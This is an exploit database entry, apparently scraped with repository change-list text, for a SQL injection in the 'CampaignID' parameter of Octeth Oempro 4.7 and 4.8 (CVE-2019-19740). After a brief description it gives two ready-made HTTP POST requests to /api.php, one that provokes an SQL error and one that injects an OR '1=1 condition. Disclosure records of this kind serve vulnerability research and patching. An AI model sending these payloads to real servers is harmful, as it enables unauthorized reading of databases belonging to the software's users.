0cd38b15b8
5 changes to exploits/shellcodes macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image Pachev FTP Server 1.0 - Path Traversal ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection Webtareas 2.0 - 'id' SQL Injection OLK Web Store 2020 - Cross-Site Request Forgery Webtareas 2.0 - 'id' SQL Injection OLK Web Store 2020 - Cross-Site Request Forgery Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password) Octeth Oempro 4.8 - 'CampaignID' SQL Injection Centreon 19.10.5 - Database Credentials Disclosure Centreon 19.10.5 - Remote Command Execution
24 lines
No EOL
707 B
Text
24 lines
No EOL
707 B
Text
# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
|
|
# Date: 2020-01-27
|
|
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
|
|
# Vendor Homepage: www2.octeth.com
|
|
# Version: Octeth Oempro v.4.7 and v.4.8
|
|
# Tested on: Oempro v.4.7
|
|
# CVE : CVE-2019-19740
|
|
|
|
|
|
An authenticated user can easily exploit this vulnerability. Octeth Oempro
|
|
4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get
|
|
is vulnerable.
|
|
|
|
# Error condition
|
|
POST /api.php HTTP/1.1
|
|
Host: 127.0.0.1
|
|
|
|
command=Campaign.Get&CampaignID=2019'&responseformat=JSON
|
|
|
|
# SQL Injection exploitation
|
|
POST /api.php HTTP/1.1
|
|
Host: 127.0.0.1
|
|
|
|
command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON |